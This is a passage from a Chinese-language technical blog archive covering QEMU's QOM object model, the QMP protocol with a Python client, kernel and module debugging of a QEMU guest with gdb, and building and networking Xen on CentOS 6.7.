            ObjectClass *klass = OBJECT_CLASS(iface);

            type_initialize_interface(ti, iface->interface_type, klass->type);
        }

        for (i = 0; i < ti->num_interfaces; i++) {
            TypeImpl *t = type_get_by_name(ti->interfaces[i].typename);
            for (e = ti->class->interfaces; e; e = e->next) {
                TypeImpl *target_type = OBJECT_CLASS(e->data)->type;

                if (type_is_ancestor(target_type, t)) {
                    break;
                }
            }

            if (e) {
                continue;
            }

            type_initialize_interface(ti, t, t);
        }
    } else {
        ti->class->properties = g_hash_table_new_full(
            g_str_hash, g_str_equal, g_free, object_property_free);
    }

    ti->class->type = ti;

    while (parent) {
        if (parent->class_base_init) {
            parent->class_base_init(ti->class, ti->class_data);
        }
        parent = type_get_parent(parent);
    }

    if (ti->class_init) {
        ti->class_init(ti->class, ti->class_data);
    }
}

开头我们可以看到，如果ti->class已经存在说明已经初始化了，直接返回，再看，如果有parent，会递归调用type_initialize，即调用父对象的初始化函数。

这里我们看到type也有一个层次关系，即QOM 对象的层次结构。在serial_isa_info 结构的定义中，我们可以看到有一个.parent域，

static const TypeInfo serial_isa_info = {
    .name          = TYPE_ISA_SERIAL,
    .parent        = TYPE_ISA_DEVICE,
    .instance_size = sizeof(ISASerialState),
    .class_init    = serial_isa_class_initfn,
};

这说明TYPE_ISA_SERIAL的父type是TYPE_ISA_DEVICE，在hw/isa/isa-bus.c中可以看到isa_device_type_info的父type是TYPE_DEVICE

static const TypeInfo isa_device_type_info = {
    .name = TYPE_ISA_DEVICE,
    .parent = TYPE_DEVICE,
    .instance_size = sizeof(ISADevice),
    .instance_init = isa_device_init,
    .abstract = true,
    .class_size = sizeof(ISADeviceClass),
    .class_init = isa_device_class_init,
};

依次往上溯我们可以得到这样一条type的链，

TYPE_ISA_SERIAL->TYPE_ISA_DEVICE->TYPE_DEVICE->TYPE_OBJECT

事实上，qemu中有两种根type，还有一种是TYPE_INTERFACE。

这样我们看到其实就跟各个type初始化的顺序没有关系了。不管哪个type最先初始化，最终都会初始化到object的type。对于object，只是简单的设置了一下分配了ti->class，设置了ti->class->type的值。如果type有interface，还需要初始化ti->class->interfaces的值，每一个interface也是一个type。如果父type有interfaces，还需要将父type的interface添加到ti->class->interfaces上去。

之后，最重要的就是调用parent->class_base_init以及ti->class_init了，这相当于C++里面的构造基类的数据。我们以一个class_init为例，

static void serial_isa_class_initfn(ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(klass);

    dc->realize = serial_isa_realizefn;
    dc->vmsd = &vmstate_isa_serial;
    dc->props = serial_isa_properties;
    set_bit(DEVICE_CATEGORY_INPUT, dc->categories);
}

我们可以看到这里从ObjectClass转换成了DeviceClass，然后做了一些簿记工作。这里为什么可以做转换呢。接下来看看Class的层次结构。

三. Class的层次结构

vmxnnet3的层次多一些，我们以他为例，首先看vmxnet3_info的定义。

static const TypeInfo vmxnet3_info = {
    .name          = TYPE_VMXNET3,
    .parent        = TYPE_PCI_DEVICE,
    .class_size    = sizeof(VMXNET3Class),
    .instance_size = sizeof(VMXNET3State),
    .class_init    = vmxnet3_class_init,
    .instance_init = vmxnet3_instance_init,
};

typedef struct VMXNET3Class {
    PCIDeviceClass parent_class;
    DeviceRealize parent_dc_realize;
} VMXNET3Class;

typedef struct PCIDeviceClass {
    DeviceClass parent_class;

    void (*realize)(PCIDevice *dev, Error **errp);
    int (*init)(PCIDevice *dev);/* TODO convert to realize() and remove */
    PCIUnregisterFunc *exit;
    PCIConfigReadFunc *config_read;
    PCIConfigWriteFunc *config_write;

	...
} PCIDeviceClass;


typedef struct DeviceClass {
    /*< private >*/
    ObjectClass parent_class;
    /*< public >*/
	...
} DeviceClass;


struct ObjectClass
{
    /*< private >*/
    Type type;
    GSList *interfaces;

    const char *object_cast_cache[OBJECT_CLASS_CAST_CACHE];
    const char *class_cast_cache[OBJECT_CLASS_CAST_CACHE];

    ObjectUnparent *unparent;

    GHashTable *properties;
};

我们可以看到这样一种层次结构

VMXNET3Class->PCIDeviceClass->DeviceClass->ObjectClass

这可以看成C++中的继承关系，即当然基类就是ObjectClass，越往下包含的数据越具象。

从type_initialize中，我们可以看到，调用class_init(ti->class,ti->class_data) ，这里的ti->class就是刚刚分配出来的，对应到vmxnet3，这里就是一个VMXNET3Class结构，注意到

memcpy(ti->class, parent->class, parent->class_size);

所以VMXNET3Class的各个父Class已经被初始化了。所以当进入vmxnet3_class_init之后，调用DEVICE_CLASS和PCI_DEVICE_CLASS以及VMXNET3_DEVICE_CLASS可以分别得到其基Class，类似于C++里面的派生类转换到基类。以

PCIDeviceClass *c = PCI_DEVICE_CLASS(class);

这句为例，我们知道这里class是vmxnet3对应的class，即class->type->name=”vmxnet3”。

#define PCI_DEVICE_CLASS(klass) \
     OBJECT_CLASS_CHECK(PCIDeviceClass, (klass), TYPE_PCI_DEVICE)

#define OBJECT_CLASS_CHECK(class_type, class, name) \
    ((class_type *)object_class_dynamic_cast_assert(OBJECT_CLASS(class), (name), \
                                               __FILE__, __LINE__, __func__))

ObjectClass *object_class_dynamic_cast_assert(ObjectClass *class,
                                              const char *typename,
                                              const char *file, int line,
                                              const char *func)
{
    ObjectClass *ret;

  	...
    ret = object_class_dynamic_cast(class, typename);
    ...
    return ret;
}


ObjectClass *object_class_dynamic_cast(ObjectClass *class,
                                       const char *typename)
{
    ObjectClass *ret = NULL;
    TypeImpl *target_type;
    TypeImpl *type;

    if (!class) {
        return NULL;
    }

    /* A simple fast path that can trigger a lot for leaf classes.  */
    type = class->type;
    if (type->name == typename) {
        return class;
    }

    target_type = type_get_by_name(typename);
    if (!target_type) {
        /* target class type unknown, so fail the cast */
        return NULL;
    }

    if (type->class->interfaces &&
           ...
    } else if (type_is_ancestor(type, target_type)) {
        ret = class;
    }

    return ret;
}

static bool type_is_ancestor(TypeImpl *type, TypeImpl *target_type)
{
    assert(target_type);

    /* Check if target_type is a direct ancestor of type */
    while (type) {
        if (type == target_type) {
            return true;
        }

        type = type_get_parent(type);
    }

    return false;
}

最终会进入object_class_dynamic_cast函数，在该函数中，根据class对应的type以及typename对应的type，判断是否能够转换，判断的主要依据就是type_is_ancestor，这个判断target_type是否是type的一个祖先，如果是当然可以进行转换，否则就不行。

好了，总结一下，现在我们得到了什么，从最开始得TypeImpl初始化了每一个type对应的class，并且构建好了各个Class的继承关系。如下图所示,注意下面的***Class都包含了上面的一部分。

四. 对象的构造

我们上面已经看到了type哈希表的构造以及class的初始化，接下来讨论具体设备的创建。

以vmxnet3为例，我们需要再命令行指定-device vmxnet3。在main中，有这么一句话

if (qemu_opts_foreach(qemu_find_opts("device"),
                      device_init_func, NULL, NULL)) {
    exit(1);
}

对参数中的device调用device_init_func函数，调用链

device_init_func->qdev_device_add

在qdev_device_add中我们可以看到这么一句话

 dev = DEVICE(object_new(driver));

DeviceState *qdev_device_add(QemuOpts *opts, Error **errp)
{
    DeviceClass *dc;
    const char *driver, *path;
    DeviceState *dev;
    BusState *bus = NULL;
    Error *err = NULL;

    driver = qemu_opt_get(opts, "driver");
    if (!driver) {
        error_setg(errp, QERR_MISSING_PARAMETER, "driver");
        return NULL;
    }

    /* find driver */
    dc = qdev_get_device_class(&driver, errp);
    if (!dc) {
        return NULL;
    }

    /* find bus */
    path = qemu_opt_get(opts, "bus");
    if (path != NULL) {
        bus = qbus_find(path, errp);
        if (!bus) {
            return NULL;
        }
        if (!object_dynamic_cast(OBJECT(bus), dc->bus_type)) {
            error_setg(errp, "Device '%s' can't go on %s bus",
                       driver, object_get_typename(OBJECT(bus)));
            return NULL;
        }
    } else if (dc->bus_type != NULL) {
        bus = qbus_find_recursive(sysbus_get_default(), NULL, dc->bus_type);
        if (!bus || qbus_is_full(bus)) {
            error_setg(errp, "No '%s' bus found for device '%s'",
                       dc->bus_type, driver);
            return NULL;
        }
    }
    if (qdev_hotplug && bus && !qbus_is_hotpluggable(bus)) {
        error_setg(errp, QERR_BUS_NO_HOTPLUG, bus->name);
        return NULL;
    }

    /* create device */
    dev = DEVICE(object_new(driver));

    if (bus) {
        qdev_set_parent_bus(dev, bus);
    }

    qdev_set_id(dev, qemu_opts_id(opts));

    /* set properties */
    if (qemu_opt_foreach(opts, set_property, dev, &err)) {
        error_propagate(errp, err);
        object_unparent(OBJECT(dev));
        object_unref(OBJECT(dev));
        return NULL;
    }

    dev->opts = opts;
    object_property_set_bool(OBJECT(dev), true, "realized", &err);
    if (err != NULL) {
        error_propagate(errp, err);
        dev->opts = NULL;
        object_unparent(OBJECT(dev));
        object_unref(OBJECT(dev));
        return NULL;
    }
    return dev;
}

对象的调用是通过object_new(driver)实现的，这里的driver就是设备名，vmxnet3，

object_new->object_new_with_type->object_initialize_with_type


Object *object_new_with_type(Type type)
{
    Object *obj;

    g_assert(type != NULL);
    type_initialize(type);

    obj = g_malloc(type->instance_size);
    object_initialize_with_type(obj, type->instance_size, type);
    obj->free = g_free;

    return obj;
}

static void object_init_with_type(Object *obj, TypeImpl *ti)
{
    if (type_has_parent(ti)) {
        object_init_with_type(obj, type_get_parent(ti));
    }

    if (ti->instance_init) {
        ti->instance_init(obj);
    }
}

从上面函数看，也会递归初始化每一个object的父object，之后调用instance_init函数。这里又涉及到了object的继承。

typedef struct {
        PCIDevice parent_obj;
        ...
} VMXNET3State;

struct PCIDevice {
    DeviceState qdev;

   ...
};

struct DeviceState {
    /*< private >*/
    Object parent_obj;
    /*< public >*/

    
};

struct Object
{
    /*< private >*/
    ObjectClass *class;
    ObjectFree *free;
    GHashTable *properties;
    uint32_t ref;
    Object *parent;
};

这次的继承体系是

VMXNET3State->PCIDevice->DeviceState->Object

这样就创建好了一个DeviceState，当然其实也是VMXNET3State，并且每一个父object的instance_init函数都已经调用好了，这里我们看看object、deviceobject、pcideviceobject的init函数都干了啥

static void object_instance_init(Object *obj)
{
    object_property_add_str(obj, "type", qdev_get_type, NULL, NULL);
}


static void device_initfn(Object *obj)
{
    DeviceState *dev = DEVICE(obj);
    ObjectClass *class;
    Property *prop;

    if (qdev_hotplug) {
        dev->hotplugged = 1;
        qdev_hot_added = true;
    }

    dev->instance_id_alias = -1;
    dev->realized = false;

    object_property_add_bool(obj, "realized",
                             device_get_realized, device_set_realized, NULL);
    object_property_add_bool(obj, "hotpluggable",
                             device_get_hotpluggable, NULL, NULL);
    object_property_add_bool(obj, "hotplugged",
                             device_get_hotplugged, device_set_hotplugged,
                             &error_abort);

    class = object_get_class(OBJECT(dev));
    do {
        for (prop = DEVICE_CLASS(class)->props; prop && prop->name; prop++) {
            qdev_property_add_legacy(dev, prop, &error_abort);
            qdev_property_add_static(dev, prop, &error_abort);
        }
        class = object_class_get_parent(class);
    } while (class != object_class_by_name(TYPE_DEVICE));

    object_property_add_link(OBJECT(dev), "parent_bus", TYPE_BUS,
                             (Object **)&dev->parent_bus, NULL, 0,
                             &error_abort);
    QLIST_INIT(&dev->gpios);
}

可以看到主要就是给对象添加了一些属性，object的type属性啊，device里面的realized、hotpluggable属性等，值得注意的是device_initfn还根据class->props添加的添加了属性，在vmxnet3_class_init函数中，我们可以看到，在class被初始化的时候，其已经赋值vmxnet3_properties，

static Property vmxnet3_properties[] = {
    DEFINE_NIC_PROPERTIES(VMXNET3State, conf),
    DEFINE_PROP_BIT("x-old-msi-offsets", VMXNET3State, compat_flags,
                    VMXNET3_COMPAT_FLAG_OLD_MSI_OFFSETS_BIT, false),
    DEFINE_PROP_BIT("x-disable-pcie", VMXNET3State, compat_flags,
                    VMXNET3_COMPAT_FLAG_DISABLE_PCIE_BIT, false),
    DEFINE_PROP_END_OF_LIST(),
};

这样，object_new之后，创建的object其实已经具有了很多属性了，这是从父object那里继承过来的。

接着看qdev_device_add函数，调用了object_property_set_bool

object_property_set_bool->object_property_set_qobject->object_property_set->property_set_bool->device_set_realized->vmxnet3_realize

最终，我们的vmxnet3_realize函数被调用了，这也就完成了object的构造，不同于type和class的构造，object当然是根据需要创建的，只有在命令行指定了设备或者是热插一个设备之后才会有object的创建。Class和object之间是通过Object的class域联系在一起的。如下图所示。

五. 总结

从上文可以看出，我把QOM的对象构造分成三部分，第一部分是type的构造，这是通过TypeInfo构造一个TypeImpl的哈希表，这是在main之前完成的，第二部分是class的构造，这是在main中进行的，这两部分都是全局的，也就是只要编译进去了的QOM对象都会调用，第三部分是object的构造，这是构造具体的对象实例，在命令行指定了对应的设备时，才会创建object。从上上面也可以看出，正如Paolo Bonzini所说的，qemu在object方面的多态是一种class based的，而属性方面，是动态构造的，每个实例可能都有不同的属性，这是一种prototype based的多态。

本文主要是对整个对象的产生做了介绍，没有对interface和property做过多介绍，maybe以后又机会再详细说吧。

后记

这篇文章很早很早以前就说写了，15年还在学校就应该写的，结果今年忙于挖洞，一直就拖啊拖的，一直到现在终于把这个坑填上，鄙视一下自己，自己已经准备了好多qemu内容，一直没有时间填坑，希望有时间都填上。

参考

QEMU设备模拟
QOM exegesis and apocalypse, Paolo Bonzini, KVM Forum 2014

QMP简介

2016-07-22T00:00:00+00:00

QMP是一种基于JSON格式的传输协议，可以用于与虚拟机的交互，比如查询虚拟机的内部状态，进行设备的热插拔等。

有多种方法使用qmp，这里简要介绍通过tcp和unix socket使用qmp。

通过TCP使用QMP

使用-qmp添加qmp相关参数：

./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp tcp:localhost:1234,server,nowait

使用telnet连接localhost:1234

telnet localhost 1234

之后就可以使用qmp的命令和虚拟机交互了

[root@localhost ~]# telnet localhost 1234
Trying ::1...
Connected to localhost.
Escape character is '^]'.
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}

通过unix socket使用QMP

使用unix socket创建qmp：

./qemu-system-x86_64 -m 2048 -hda /root/centos6.img -enable-kvm -qmp unix:/tmp/qmp-test,server,nowait

使用nc连接该socket:

nc -U /tmp/qmp-test

之后就一样了。

[root@localhost qmp]# nc -U /tmp/qmp-test
{"QMP": {"version": {"qemu": {"micro": 0, "minor": 6, "major": 2}, "package": ""}, "capabilities": []}}
{ "execute": "qmp_capabilities" }
{"return": {}}
{ "execute": "query-status" }
{"return": {"status": "running", "singlestep": false, "running": true}}

QMP的详细命令格式可以在qemu的代码树主目录下面的qmp-commands.hx中找到。

自动批量发送QMP命令

可以通过这里的方法向虚拟机自动批量的发送QMP命令，这对于测试虚拟机的一些功能是很有用的。试了一下，对于unix socket的方法使能够使用的，对于tcp连接的方法没有使用成功。为了防止连接失效，代码附在下面：

# QEMU Monitor Protocol Python class
#
# Copyright (C) 2009 Red Hat Inc.
#
# This work is licensed under the terms of the GNU GPL, version 2.  See
# the COPYING file in the top-level directory.

import socket, json, time, commands
from optparse import OptionParser

class QMPError(Exception):
    pass

class QMPConnectError(QMPError):
    pass

class QEMUMonitorProtocol:
    def connect(self):
        print self.filename
        self.sock.connect(self.filename)
        data = self.__json_read()
        if data == None:
            raise QMPConnectError
        if not data.has_key('QMP'):
            raise QMPConnectError
        return data['QMP']['capabilities']

    def close(self):
        self.sock.close()

    def send_raw(self, line):
        self.sock.send(str(line))
        return self.__json_read()

    def send(self, cmdline, timeout=30, convert=True):
        end_time = time.time() + timeout
        if convert:
            cmd = self.__build_cmd(cmdline)
        else:
            cmd = cmdline
	    print("*cmdline = %s" % cmd)
        print cmd
        self.__json_send(cmd)
        while time.time() < end_time:
            resp = self.__json_read()
            if resp == None:
                return (False, None)
            elif resp.has_key('error'):
                return (False, resp['error'])
            elif resp.has_key('return'):
                return (True, resp['return'])


    def read(self, timeout=30):
        o = ""
        end_time = time.time() + timeout
        while time.time() < end_time:
            try:
                o += self.sock.recv(1024)
                if len(o) > 0:
                    break
            except:
                time.sleep(0.01)
        if len(o) > 0:
            return json.loads(o)
        else:
            return None

    def __build_cmd(self, cmdline):
        cmdargs = cmdline.split()
        qmpcmd = { 'execute': cmdargs[0], 'arguments': {} }
        for arg in cmdargs[1:]:
            opt = arg.split('=')
            try:
                value = int(opt[1])
            except ValueError:
                value = opt[1]
            qmpcmd['arguments'][opt[0]] = value
	print("*cmdline = %s" % cmdline)
        return qmpcmd

    def __json_send(self, cmd):
        # XXX: We have to send any additional char, otherwise
        # the Server won't read our input
        self.sock.send(json.dumps(cmd) + ' ')

    def __json_read(self):
        try:
            return json.loads(self.sock.recv(1024))
        except ValueError:
            return

    def __init__(self, filename, protocol="tcp"):
        if protocol == "tcp":
            self.filename = ("localhost", int(filename))
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        elif protocol == "unix":
            self.filename = filename
            print self.filename
            self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        #self.sock.setblocking(0)
        self.sock.settimeout(5)

if __name__ == "__main__":
    parser = OptionParser()
    parser.add_option('-n', '--num', dest='num', default='10', help='Times want to try')
    parser.add_option('-f', '--file', dest='port', default='4444', help='QMP port/filename')
    parser.add_option('-p', '--protocol', dest='protocol',default='tcp', help='QMP protocol')
    def usage():
        parser.print_help()
        sys.exit(1)

    options, args = parser.parse_args()

    print options
    if len(args) > 0:
        usage()

    num = int(options.num)
    qmp_filename = options.port
    qmp_protocol = options.protocol
    qmp_socket = QEMUMonitorProtocol(qmp_filename,qmp_protocol)
    qmp_socket.connect()
    qmp_socket.send("qmp_capabilities")
    qmp_socket.close()


##########################################################
#Usage
#Options:
#  -h, --help            show this help message and exit
#  -n NUM, --num=NUM     Times want to try
#  -f PORT, --file=PORT  QMP port/filename
#  -p PROTOCOL, --protocol=PROTOCOL
#                        QMP protocol
# e.g: # python xxxxx.py -n $NUM -f $PORT
##########################################################

通过QEMU调试Linux内核

2016-06-21T00:00:00+00:00

前言

相信从Windows内核转到Linux内核的人最开始都会对Windows的内核调试机制非常怀念，在Linux的远古时代调试内核是非常不方便的，或者需要打kgdb的补丁，或者多用用printk也能把问题解决了。当我刚开始接触虚拟化的时候就意识到这绝对是双机调试的绝佳场景，果然很快就在网上找到了通过QEMU调试Linux内核的文章。之前由于种种原因一直没有时间和机会尝试，最近终于下定决心搞定他，开始折腾了几天。鉴于网上的材料千篇一律，并且很多的坑都没有提到，写了这篇文章，希望能够帮助有需要的人。我对于QEMU和KVM还是区分得很开的，QEMU是虚拟化软件，KVM是内核模块用于QEMU的加速，代码的native执行。文中提到的QEMU虚拟机默认都是用了KVM加速的。

本文环境：

VMWare中的一台CentOS 7 x64作为宿主机
QEMU虚拟机是CentOS 6.7 x64
虚拟机内核源码版本：3.18.35

文末提供了使用的内核模块源码，最简单的hello world Linux驱动版。

虚拟机创建

为了简单起见，使用libvirt的方式安装虚拟化环境

yum install qemu-kvm qemu-img virt-manager libvirt libvirt-python libvirt-client virt-install virt-viewer

接着使用virt-manager创建虚拟机。

在创建好虚拟机之后,在内核官网下载内核源码，我用的版本是3.18.35，修改根目录下面的Makefile文件将617行”-O3”改为”-O1”。当然，-O0是最好的，但是如此文中所说，-O0有一个bug，3.18.35版本也是编译会出问题。

ifdef CONFIG_CC_OPTIMIZE_FOR_SIZE
KBUILD_CFLAGS	+= -Os $(call cc-disable-warning,maybe-uninitialized,)
else
KBUILD_CFLAGS	+= -O1//修改此处

之后更换虚拟机中的内核,注意KGDB的配置，似乎是默认就有的。

make menuconfig
make 
make modules_install
make install

这样就替换了QEMU虚拟机中的内核了。

修改虚拟机配置文件

为了支持qemu虚拟机调试，需要通过libvirt传递命令行参数给qemu进程。具体如下修改：使用virsh list从第二列得到虚拟机名字，通过virsh edit 即可修改虚拟机配置文件。注意修改主要是两处：

<domain type='kvm' xmlns:qemu='http://libvirt.org/schemas/domain/qemu/1.0'>

这是通过libvirt向qemu传递参数所必须的。

在最后一个节点devices之后添加qemu:commandline节点，注意一定要在最后。

 <qemu:commandline>
    <qemu:arg value='-S'/>
    <qemu:arg value='-gdb'/>
    <qemu:arg value='tcp::1234'/>
  </qemu:commandline>

调试QEMU虚拟机模块

首先需要在宿主机的创建一个与虚拟机中目录一样的Linux内核代码树，为了方便，虚拟机中内核源码在/root/linux-3.18.35目录下，可以直接使用：

scp -r linux-3.18.35 [email protected]:/root

这样，虚拟机就和宿主机中的访问路径一样了，对于内核模块同样如此。

在宿主机中启动gdb，监听端口，在virt-manager中开启虚拟机，可以看到虚拟机被断下来了，在这里先讨论模块的调试，因为内核的调试还有坑，后面再谈，直接c运行虚拟机。

[root@localhost gdb]# ./gdb ~/linux-3.18.35/vmlinux
GNU gdb (GDB) 7.9
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /root/linux-3.18.35/vmlinux...done.
(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb) 

当使用ctrl-c断下虚拟机时，可能会出现

Remote 'g' packet reply is too long

可以在这里找到一个patch，打上就好了。

在do_init_module下断点之后，在虚拟机中insmod poc.ko，可以看到虚拟机已经被断下来了，参数mod->sect_attrs->attrs放的是各个section的信息，在这个hello world的驱动中，只有.text信息，并没有.bss和.data，我们需要将这些信息提供给gdb。使用如下命令即可：

add-symbol-file xxx.ko <text addr> -s .data <data addr> -s .bss <bss addr>

之后就可以在模块中进行单步调试了。整个过程如下：

^C
Program received signal SIGINT, Interrupt.
default_idle () at arch/x86/kernel/process.c:316
warning: Source file is more recent than executable.
316		trace_cpu_idle_rcuidle(PWR_EVENT_EXIT, smp_processor_id());
(gdb) b do_init_module
Breakpoint 1 at 0xffffffff810c5c0e: file kernel/module.c, line 3043.
(gdb) c
Continuing.

Breakpoint 1, do_init_module (mod=0xffffffffa02010e0) at kernel/module.c:3043
warning: Source file is more recent than executable.
3043		current->flags &= ~PF_USED_ASYNC;
(gdb) p /x  mod->sect_attrs->attrs[1]->address 
$1 = 0xffffffffa0201000
(gdb) add-symbol-file ~/hello/poc.ko 0xffffffffa0201000
add symbol table from file "/root/hello/poc.ko" at
	.text_addr = 0xffffffffa0201000
(y or n) y
Reading symbols from /root/hello/poc.ko...done.
(gdb) b hello_init 
Breakpoint 2 at 0xffffffffa020100d: file /root/hello/poc.c, line 7.
(gdb) c
Continuing.

Breakpoint 2, hello_init () at /root/hello/poc.c:7
7		struct task_struct *ts = current;
(gdb) n
p t8		printk("hello,world,%s\n",current->comm);
(gdb) p ts
$2 = (struct task_struct *) 0xffff88003c0b2190
(gdb) p ts->pid
$3 = 2629
(gdb) p ts->comm
$4 = "insmod\000erminal\000"
(gdb) n
9		ts = NULL;
(gdb) n
10		ts->pid=123;
(gdb) p ts
$5 = (struct task_struct *) 0x0 <irq_stack_union>
(gdb) p ts->pid
Cannot access memory at address 0x7f0
(gdb) n

调试虚拟机内核

上面的过程是调试可加载模块的方法，很多文章都说直接在虚拟机连过来的时候b start_kernel就可以调试内核了，然而真实情况并不是，你会看到虚拟机根本不会在这个断点停留，也不会在内核代码中的其他断点停留。

找了好久终于在这里找到了答案，一句话：需要下硬件断点才行。之后就可以下软断点了。

(gdb) target remote localhost:1234
Remote debugging using localhost:1234
0x0000000000000000 in irq_stack_union ()
(gdb) hb start_kernel//硬件断点
Hardware assisted breakpoint 1 at 0xffffffff81b40044: file init/main.c, line 501.
(gdb) c
Continuing.

Breakpoint 1, start_kernel () at init/main.c:501
warning: Source file is more recent than executable.
501	{
(gdb) n
510		set_task_stack_end_magic(&init_task);
(gdb) n
511		smp_setup_processor_id();
(gdb) p init_task
$1 = {state = 0, stack = 0xffffffff81a00000 <init_thread_union>, usage = {
...
(gdb) b security_init
Breakpoint 2 at 0xffffffff81b6ff8a: file security/security.c, line 67.
(gdb) c
Continuing.

Breakpoint 2, security_init () at security/security.c:67
warning: Source file is more recent than executable.
67		printk(KERN_INFO "Security Framework initialized\n");
(gdb) 

使用的hello world Linux驱动源码

#include <linux/init.h>
#include <linux/module.h>
#include <linux/sched.h>

static int hello_init(void)
{
	struct task_struct *ts = current;
	printk("hello,world,%s\n",current->comm);
	ts = NULL;
	ts->pid=123;
	return 0;
}

static void hello_exit(void)
{
	printk("goodbye,world\n");
}

module_init(hello_init);
module_exit(hello_exit);

Makefile文件,注意-O0不优化

obj-m := poc.o
KDIR :=/lib/modules/$(shell uname -r)/build
PWD := $(shell pwd)
ccflags-y = -O0
default:
	$(MAKE) -C $(KDIR) M=$(PWD) modules

注意事项

宿主机和虚拟机中的目录要一致，内核和自己添加的模块都需要
gdb记得打补丁
调试内核代码的时候最开始记得用硬件断点

参考

CentOS 6.7为Xen 4.5虚拟机搭建桥接网络

2016-05-13T00:00:00+00:00

前言

上一篇文章CentOS 6.7源码安装Xen讨论了从源码安装Xen的问题。但是这样安装好的Xen，创建虚拟机并不能使用网络，这篇文章就是为Xen虚拟机搭建桥接网络。

使用network替换NetworkManager

CentOS 6.7的网络管理服务NetworkManager不支持桥接，所以需要把NetworkManager换成network。

chkconfig NetworkManager off  
chkconfig network on  
service NetworkManager stop  
service network start 

之后在/etc/sysconfig/network-scripts目录下添加ifcfg-eth0文件，文件内容如下：

DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no

service network restart之后就使用network了。

添加xenbr0

brctl addbr xenbr0

修改/etc/sysconfig/network-scripts/ifcfg-eth0

DEVICE=eth0
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no
BRIDGE=xenbr0

添加文件/etc/sysconfig/network-scripts/ifcfg-xenbr0

DEVICE=xenbr0
TYPE=bridge
ONBOOT=yes
BOOTPROTO=dhcp
NM_CONTROLLED=no

之后sercie network restart重启网络，在虚拟机配置文件中使用 vif = [‘mac=00:01:02:03:04:05,bridge=xenbr0’]就不会报错了，Xen虚拟机也能上网了。再把虚拟机里面的内核替换掉，就可以做到自主编译，自主可控了，哈哈。

CentOS 6.7源码安装Xen

2016-04-26T00:00:00+00:00

前言

一直习惯了QEMU && KVM组合，最近准备尝试一下Xen，遇到了很多坑，为了方便他人少踩坑，所以写了此文。回首编译Xen的过程，也就不难理解当年社区为啥不看好Xen了，QEMU && KVM的结构不仅从架构上来简单清晰，安装使用也很方便，反观Xen，各种坑。不过自己躺一遍这些坑倒是能够提高一下耐心和对Xen的理解。

环境

Dom0:CentOS 6.7 x64,kernel version:3.18.24
Xen:4.5.4

安装Xen

可从Xen官网或者使用git下载，使用如下命令编译安装Xen

./configure --prefix=/usr
make dist
make install
ldconfig

此时在/boot下面应该已经会有Xen的内核了，之前卡在这里就是在CentOS7下面编译Xen老是提示一个错误”set sse instruction disable”，然后折腾了好久，后来实在搞不定就换成6.7了，开源的东西伤不起，估计跟gdb的sse编译选项有关。

安装Dom0内核

这个用新一点的，Linux版本都4.x了，总不能还用2.6的吧内核，主要是早期对Xen支持不行，我用的是3.18。

make menuconfig进去之后死活找不到Xen的相关选项。特别是vpsee的那边流传甚广的文章对此也没有说清楚，可能是人家太熟悉了，直接滤过，导致走了不少弯路。后来才在官网找到了（所以，大家不要偷懒，该看文档还是要老老实实看)

make menuconfig进入配置界面之后，因为有一些依赖关系，所以最重要的首先需要在

Processor type and features | Linux guest support

打开，一股脑儿把这下面的都打开。后面的各种Xen选项就开了，Xen支持的几个选项是在以下几个项目中：

Processor type and features | Linux guest support
Device Drivers | Character devices
Device Drivers | Block device 
Device Drivers | Network device support
Device Drivers | Xen driver support

把上面与Xen有关的都最后还有一个CONFIG_CLEANCACHE和CONFIG_FRONTSWAP的选项也是在Processor Type and features，这里有个小tips就是在make menuconfig之后，直接输入”/”输入相关的关键字就可以查找对应的选项在哪个配置项里面。配置完了之后记得对照Mainline Linux Kernel Configs上面的检查一下。之后就可以愉快的编译内核了

make 
make modules_install
make install

添加启动条目

内核安装完了之后，在/boot下面就应该能够看见新内核的镜像了，在/boot/grub/menu.lst下面应该也会有一个新的启动项，复制新内核的启动条目放到最后，将root下面添加一行

kernel /xen-4.5.gz

之前的kernel和initrd都改成module，更改后类似下面这样

title Xen
root(hd0,0)
kernel /xen-4.5.gz
module /vmlinuz-3.18.24 xxxxxxxxxx
module /initramfs-3.18.24.img

其他

重启之后选择Xen启动，进入系统使用使用xl命令可能还会有错，如果是so找不到可以找到安装目录做一个软连接，如果是

xc: error: Could not obtain handle on privileged command interface (2 = No such file or directory): Internal error

需要再/etc/fstab中添加一行

none /proc/xen xenfs defaults 0 0

最后记得把xencommons设为开机启动

chkconfig --level 5 xencommons on

参考

QEMU参数解析

2015-09-26T00:00:00+00:00

前言

快毕业了，准备把虚拟化的东西都整理一下，准备开始新的旅程。希望这是一个系列，主要涉及虚拟化的理论与实践，包括但不限于理论基础、源码分析、外文翻译以及Demo实例。本篇文章首先分析一下QEMU的参数解析部分。

一. 使用gdb分析QEMU代码

使用configure生成Makefile的时候指定参数包括–enable-kvm –enable-debug –target-list=”x86_64-softmmu”
从QEMU官方下载一个精简镜像linux-0.2.img wget http://wiki.qemu.org/download/linux-0.2.img.bz2
启动gdb调试QEMU命令

gdb –args /usr/bin/bin/qemu-system-x86_64 linux-0.2.img -m 512 -enable-kvm -smp 1,sockets=1,cores=1,threads=1 -realtime mlock=off -device ivshmem,shm=ivshmem,size=1 -device ivshmem,shm=ivshmem1,size=2

这里使用了这么多参数，主要是为了之后对QEMU解析参数有比较好的理解。

二. QEMU参数解析

QEMU定义了QEMUOption来表示QEMU程序的参数选项。定义如下

